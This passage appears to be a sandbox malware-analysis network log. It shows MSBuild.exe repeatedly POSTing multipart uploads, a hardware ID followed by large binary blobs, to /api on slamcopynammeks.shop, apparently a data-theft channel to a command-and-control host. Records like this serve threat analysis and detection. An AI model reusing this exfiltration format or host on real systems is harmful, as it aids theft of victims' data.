2024-05-24 08:26:03 UTC	1369	IN	Data Raw: 33 58 38 6a 2f 45 4e 6e 46 59 39 62 4c 54 68 42 7a 64 78 33 36 6b 57 67 7a 61 59 69 50 47 5a 39 2f 73 78 59 48 51 58 77 35 4b 67 49 39 53 38 32 41 32 74 52 48 4d 36 38 61 64 45 49 51 4f 43 2b 55 66 48 54 75 53 59 2f 37 2f 30 69 54 4a 4c 47 52 65 4e 6b 4b 73 76 37 70 6e 62 4a 73 49 56 49 53 4c 72 74 56 59 39 56 63 4f 38 45 5a 59 77 6a 4d 43 50 36 62 69 47 55 43 64 69 55 49 7a 66 73 79 50 55 76 4e 67 4e 70 68 56 72 49 49 71 66 66 52 45 39 6b 61 63 51 6a 6a 65 5a 69 71 48 51 33 2f 67 78 53 30 30 5a 38 37 75 59 4c 61 53 58 36 77 2f 70 59 44 42 73 76 66 41 41 61 78 76 32 75 42 32 53 4e 6f 69 51 76 70 66 52 2b 44 46 4c 4d 6c 48 62 69 4c 45 2b 38 72 2f 59 4a 75 6c 52 49 69 4c 72 74 55 59 6f 44 59 54 39 51 4d 56 30 35 2b 79 75 6d 66 66 37 51 30 67 5a 50 4e 76 47 Data Ascii: 3X8j/ENnFY9bLThBzdx36kWgzaYiPGZ9/sxYHQXw5KgI9S82A2tRHM68adEIQOC+UfHTuSY/7/0iTJLGReNkKsv7pnbJsIVISLrtVY9VcO8EZYwjMCP6biGUCdiUIzfsyPUvNgNphVrIIqffRE9kacQjjeZiqHQ3/gxS00Z87uYLaSX6w/pYDBsvfAAaxv2uB2SNoiQvpfR+DFLMlHbiLE+8r/YJulRIiLrtUYoDYT9QMV05+yumff7Q0gZPNvG
2024-05-24 08:26:03 UTC	1369	IN	Data Raw: 57 4b 44 61 70 48 49 53 32 69 34 52 74 71 55 5a 32 6d 42 70 67 71 7a 38 6e 7a 6c 39 4f 55 55 53 78 33 55 49 75 66 34 58 32 33 32 36 55 42 72 55 64 7a 4c 50 47 33 42 33 46 5a 77 36 41 51 32 6a 65 5a 69 71 48 55 6d 70 63 57 4b 47 4e 61 6c 35 43 39 4c 2f 7a 43 75 45 47 76 57 43 59 74 6f 75 45 56 62 46 47 64 70 67 61 59 4b 73 2b 34 2f 37 2f 30 2b 78 6f 34 4d 67 2f 5a 6b 4d 5a 75 73 74 6d 30 57 37 67 59 45 32 6d 2f 39 42 70 37 55 5a 48 67 66 2f 35 4e 7a 34 48 78 6a 39 33 44 46 45 67 5a 50 4e 76 55 34 69 33 6b 6c 65 4d 66 38 67 42 67 4e 65 4f 6c 66 68 46 4a 6e 38 5a 38 6a 45 37 6b 37 50 48 42 33 38 67 59 63 6a 77 2f 38 4c 75 7a 66 2f 79 50 38 51 33 75 56 69 46 77 74 66 51 41 65 52 48 76 6b 42 61 59 4b 63 4f 4a 75 74 65 59 67 45 77 37 50 6c 2b 59 79 75 6c 54 67 Data Ascii: WKDapHIS2i4RtqUZ2mBpgqz8nzl9OUUSx3UIuf4X2326UBrUdzLPG3B3FZw6AQ2jeZiqHUmpcWKGNal5C9L/zCuEGvWCYtouEVbFGdpgaYKs+4/7/0+xo4Mg/ZkMZustm0W7gYE2m/9Bp7UZHgf/5Nz4Hxj93DFEgZPNvU4i3kleMf8gBgNeOlfhFJn8Z8jE7k7PHB38gYcjw/8Luzf/yP8Q3uViFwtfQAeRHvkBaYKcOJuteYgEw7Pl+YyulTg

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49708	104.21.12.112	443	5316	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-24 08:26:04 UTC	286	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 12836 Host: slamcopynammeks.shop
2024-05-24 08:26:04 UTC	12836	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 43 39 38 30 39 33 44 36 34 33 37 46 46 38 34 32 32 33 33 43 38 41 37 35 31 43 33 30 37 31 36 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 52 54 53 43 66 32 2d 2d 53 75 6e 61 72 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"6C98093D6437FF842233C8A751C30716--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"RTSCf2--Sunar
2024-05-24 08:26:05 UTC	810	IN	HTTP/1.1 200 OK Date: Fri, 24 May 2024 08:26:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=n3iguqsk0hps3l9surqpoqeuvs; expires=Tue, 17-Sep-2024 02:12:43 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hMn3XQgPSo5CQO9SXiebI5LMpM35vOdUYeozZKRASvgX1K5H43PlWJRn8pdDLhox%2FcRSv4kZx90guQ605Jwken2lmC1Ibc2SQdaAm%2Bj2CjHkLCnQ8ZnjVXfcJr%2B5Um%2FPsgQ6ffq5RA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 888be60fedb64237-EWR alt-svc: h3=":443"; ma=86400
2024-05-24 08:26:05 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 0d 0a Data Ascii: fok 8.46.123.175
2024-05-24 08:26:05 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49709	104.21.12.112	443	5316	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-24 08:26:05 UTC	286	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 15078 Host: slamcopynammeks.shop
2024-05-24 08:26:05 UTC	15078	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 43 39 38 30 39 33 44 36 34 33 37 46 46 38 34 32 32 33 33 43 38 41 37 35 31 43 33 30 37 31 36 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 52 54 53 43 66 32 2d 2d 53 75 6e 61 72 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"6C98093D6437FF842233C8A751C30716--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"RTSCf2--Sunar
2024-05-24 08:26:06 UTC	810	IN	HTTP/1.1 200 OK Date: Fri, 24 May 2024 08:26:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=t9dflmh8lpljh9utt12ptohqv7; expires=Tue, 17-Sep-2024 02:12:45 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IDxtV4jfdjyWTx6ErmeqTCf3g3bjoM4IZ2pAcm139Nc9YviNZZN31YMN8NBxUhaZZPWggH%2BLCOKPQ3%2BDMRLeaZNjsLnlk9EFgQ%2B9KS2%2FTGoLGCIAG8fwygoAxcDY2HkS0tLc62aVRw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 888be6196cd94304-EWR alt-svc: h3=":443"; ma=86400
2024-05-24 08:26:06 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 0d 0a Data Ascii: fok 8.46.123.175
2024-05-24 08:26:06 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49710	104.21.12.112	443	5316	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-24 08:26:06 UTC	286	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20568 Host: slamcopynammeks.shop
2024-05-24 08:26:06 UTC	15331	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 43 39 38 30 39 33 44 36 34 33 37 46 46 38 34 32 32 33 33 43 38 41 37 35 31 43 33 30 37 31 36 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 52 54 53 43 66 32 2d 2d 53 75 6e 61 72 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"6C98093D6437FF842233C8A751C30716--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"RTSCf2--Sunar
2024-05-24 08:26:06 UTC	5237	OUT	Data Raw: 35 13 92 cd 36 8a 95 d9 76 89 c4 4d c9 4d d9 5a b5 da 68 27 0c 46 c7 33 b7 ee 57 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 6e 20 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce 0d 46 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 81 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a 37 18 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 06 a2 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: 56vMMZh'F3Wun 4F([:7s~X`nO
2024-05-24 08:26:07 UTC	812	IN	HTTP/1.1 200 OK Date: Fri, 24 May 2024 08:26:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=64o6vcptcrbklknqrkvkrvkqo1; expires=Tue, 17-Sep-2024 02:12:46 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ypcMDFdnIzvx4q6%2B5JCAtwTVqAyC4kgkqAGWX2%2B5jEnaOwl8OGbamgP09xEFB6vPkXxB5mOI%2FHZ5hspY18bpGuc9U2ry6ycaBcyTYdUnVg7QRScGWgPbv3r0qI%2FpFvKqbJfL%2FsIjIQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 888be621ba8f43f4-EWR alt-svc: h3=":443"; ma=86400
2024-05-24 08:26:07 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 0d 0a Data Ascii: fok 8.46.123.175
2024-05-24 08:26:07 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49711	104.21.12.112	443	5316	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-24 08:26:08 UTC	285	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 7089 Host: slamcopynammeks.shop
2024-05-24 08:26:08 UTC	7089	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 43 39 38 30 39 33 44 36 34 33 37 46 46 38 34 32 32 33 33 43 38 41 37 35 31 43 33 30 37 31 36 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 52 54 53 43 66 32 2d 2d 53 75 6e 61 72 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"6C98093D6437FF842233C8A751C30716--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"RTSCf2--Sunar
2024-05-24 08:26:09 UTC	814	IN	HTTP/1.1 200 OK Date: Fri, 24 May 2024 08:26:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=mpu9i2l23cfdocionn2f0hfblh; expires=Tue, 17-Sep-2024 02:12:47 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WXeFf%2B854DA72mOTDoy1UY7WKoHAb8Y%2Fu2PFsJzYpopzftfzxO%2Bhmp%2FcBviGwxgoU%2F8E0f496v7NLmAMKBz8pH7QdszugD1XF3o5UwTaLvbkiv7F9VedNeXngSaY%2FJrKaclfTEnz2Q%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 888be62b486043f1-EWR alt-svc: h3=":443"; ma=86400
2024-05-24 08:26:09 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 0d 0a Data Ascii: fok 8.46.123.175
2024-05-24 08:26:09 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49712	104.21.12.112	443	5316	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-24 08:26:09 UTC	285	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1258 Host: slamcopynammeks.shop
2024-05-24 08:26:09 UTC	1258	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 43 39 38 30 39 33 44 36 34 33 37 46 46 38 34 32 32 33 33 43 38 41 37 35 31 43 33 30 37 31 36 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 52 54 53 43 66 32 2d 2d 53 75 6e 61 72 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"6C98093D6437FF842233C8A751C30716--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"RTSCf2--Sunar
2024-05-24 08:26:10 UTC	810	IN	HTTP/1.1 200 OK Date: Fri, 24 May 2024 08:26:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=r4p0nica5mptoe2juhkmom0jni; expires=Tue, 17-Sep-2024 02:12:49 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YPWhr4GsQlPcNi40lfbN%2Fr5vhidcHS8OafwLTOYRZ71kM%2BgMEWKZhzZWJNt2wwS6mee2J4v4giEN6DH2cvGn9TwQbBsScVg0gXByPhr0XPthZ3v4zMk%2BuV2gn626wL%2B1uv0lwvFzag%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 888be6340bd4335a-EWR alt-svc: h3=":443"; ma=86400
2024-05-24 08:26:10 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 0d 0a Data Ascii: fok 8.46.123.175
2024-05-24 08:26:10 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49713	104.21.12.112	443	5316	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-24 08:26:11 UTC	287	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 585805 Host: slamcopynammeks.shop
2024-05-24 08:26:11 UTC	15331	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 43 39 38 30 39 33 44 36 34 33 37 46 46 38 34 32 32 33 33 43 38 41 37 35 31 43 33 30 37 31 36 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 52 54 53 43 66 32 2d 2d 53 75 6e 61 72 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"6C98093D6437FF842233C8A751C30716--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"RTSCf2--Sunar
2024-05-24 08:26:11 UTC	15331	OUT	Data Raw: 44 b1 39 3c 2e b0 78 04 18 4e d5 db 55 a3 40 f6 49 b1 da 29 ab 06 bf e0 e1 ae e4 a1 99 e9 fd ee 78 60 3e 42 cd 2f fa d5 24 43 1b ab 0a 94 1f 6a ad cb ac 02 10 f8 76 34 45 fe ee d1 14 11 20 b7 08 65 35 c3 99 27 dd 69 ff ff 9e 73 19 d0 71 08 0b 67 56 c9 de bc e3 40 1b f3 5b ba 21 b8 63 bf b9 ca ed b1 3b b7 48 52 23 37 7e f3 a8 ff ae ce 3e 09 82 a6 1d fe f7 1b ae 4e 40 77 c8 03 dc 46 83 16 22 b1 3f 04 91 85 5c 30 37 45 ce 2d 33 22 b2 d2 62 a5 3f b3 8a 1b 62 ff 23 6f f8 d4 8c c6 8e 7a aa 7c 35 0f 50 24 f9 bc b8 c0 9b b6 ce 42 2d 34 3c b9 49 ad cd 82 9a ef 75 ab 8e 00 01 31 72 d6 3d ce 90 44 71 f5 ee c5 0e 9a f9 65 79 1f dc 75 3e 5d 35 36 fc fe 66 91 c5 5f db 7e 62 d4 75 49 8b 2c 97 1c fe b4 1b e4 c4 85 0b 20 4f 93 b3 7e c1 31 d2 e1 08 8a 91 d9 c1 9e ac 29 49 Data Ascii: D9<.xNU@I)x`>B/$Cjv4E e5'isqgV@[!c;HR#7~>N@wF"?\07E-3"b?b#oz\|5P$B-4<Iu1r=Dqeyu>]56f_~buI, O~1)I
2024-05-24 08:26:11 UTC	15331	OUT	Data Raw: 1d 9d 86 00 c6 97 50 da 7b da 7e 59 34 99 dc 10 af d6 d0 94 11 b0 a9 b7 54 39 99 e4 f7 09 81 14 79 c5 43 51 af 02 6d c9 81 01 5c a0 68 27 8c a5 cb 03 88 9b e9 46 0c 63 5f ce e5 95 e5 0f 9a 4d 01 ff e7 85 90 82 37 9c f1 00 70 a6 28 d9 f5 9d 9b ab 24 30 bc 2d 02 c8 af 11 dc 2b 08 98 1d 41 75 08 55 23 00 6d 25 d4 dc ff 9d 8c 73 ff 30 74 ad 17 ca 03 88 5c d5 4d dd 52 83 e8 30 dc 28 01 ce 0e a4 a6 06 49 04 52 04 b6 de 32 86 19 b3 f5 74 54 3b fd 09 8a 56 df fe c1 23 de 88 67 bf ec 95 37 aa 47 47 f6 a1 0a 40 4a bf ee f9 b7 87 7c cf 8d 84 f7 6d e3 68 b9 fb 15 bc c0 b4 94 2c 2c 86 3a ba 47 66 1a fa 5c db d0 b5 13 3f b0 dc d3 23 19 b7 0d 4f ee 1a 1c d8 ca 8c 02 29 08 f3 de 8d fb 10 c1 bb 5f a1 af 5b fc f0 ce 55 7f 44 da d1 8c 50 75 6c 2f 55 62 06 3c 8f 2f 43 b2 aa Data Ascii: P{~Y4T9yCQm\h'Fc_M7p($0-+AuU#m%s0t\MR0(IR2tT;V#g7GG@J\|mh,,:Gf\?#O)_[UDPul/Ub</C
2024-05-24 08:26:11 UTC	15331	OUT	Data Raw: fa ee 55 e2 2f 93 04 09 cd 2e 75 65 d5 b3 20 af 50 3f 36 ea a1 6a 33 ae cd cc 37 61 e8 20 f8 a4 5c ef c9 d5 55 19 2d 0a 7e 9f 71 cf 52 21 d6 62 3a ef 69 b3 7e 00 92 e7 86 6c 1b 6c db 33 a7 e9 24 27 b4 25 24 8a 87 37 a4 b0 04 bd 7b dc dd 34 c1 34 35 4b 94 62 47 cb f5 b1 1c 8c 12 dd 07 65 82 cb e8 e1 d2 0d cb c1 5b e0 cc c5 b0 a3 5a f1 c2 a0 70 7d 70 09 3d 2f 42 d8 f5 de 03 5e f8 23 ac 6e ee 66 55 8b b4 0d 8d 79 a3 7d ec 0e de 13 4c 63 9d 85 f4 64 c1 3e c0 97 a4 cf 61 57 49 50 60 7b 9f 7c 85 d9 76 56 4f f8 24 ae f0 33 0b bc 60 b4 4f c7 24 16 0c 81 45 e3 33 3f b9 23 ac cb ab 95 48 ca 33 3f 9e 50 4e 61 ad 13 33 6c 78 e0 58 e2 ee 8f 22 95 16 be 01 b7 b8 d9 b4 11 0e e5 12 1a 70 8e ef 86 ff d8 88 1b 46 70 1c 0d 03 f8 89 58 54 72 da ac dc f0 e5 a3 bd ac d1 7d d9 Data Ascii: U/.ue P?6j37a \U-~qR!b:i~ll3$'%$7{445KbGe[Zp}p=/B^#nfUy}Lcd>aWIP`{\|vVO$3`O$E3?#H3?PNa3lxX"pFpXTr}
2024-05-24 08:26:11 UTC	15331	OUT	Data Raw: 1f 5b 02 53 e7 92 ba 8b 42 4c fd 5d 7b 52 2b 6b 1f 39 7f 1b 33 24 00 7e ff 61 14 9e 69 56 89 55 7f 14 bd 64 60 6e f8 49 b9 22 70 e8 1d 1f d3 fa f0 78 c7 35 52 68 d6 31 67 de 15 1f fe 14 34 c6 bd 1b 8a 3c 0a 0d 8d 8c 51 14 1e a6 30 d8 57 c3 3b 51 ca bc 4d 4b 7d 12 49 52 49 2a 33 8b b1 30 d0 d8 3c ce df b2 0f 3b 8b b4 69 42 6f b9 5d ae f3 47 e9 b8 8d f6 e6 1f 9f 90 85 82 5c 5e ae 06 63 81 04 0d f6 91 25 c4 54 7d b8 91 51 05 ac f4 50 cc 29 99 bd 9b fb db c7 2a 75 d8 46 3e ed 3a 08 6e ce 80 03 b1 e3 5d fe 2a cb f3 9f 78 78 45 e0 ab 05 43 c9 b1 3f ee c5 3a dc ea ae 52 ff a1 93 20 ae d8 72 9a 68 12 26 02 ef 6b 52 8d 24 1d 3a 32 37 4a 3b 66 f6 32 3a 99 7e bf d0 80 77 5c b8 e6 a2 56 de d2 99 91 6c 1d 5e 2f 3f 55 e9 58 9e b5 82 0e 95 13 42 ed 50 44 b4 47 dd e9 b4 Data Ascii: 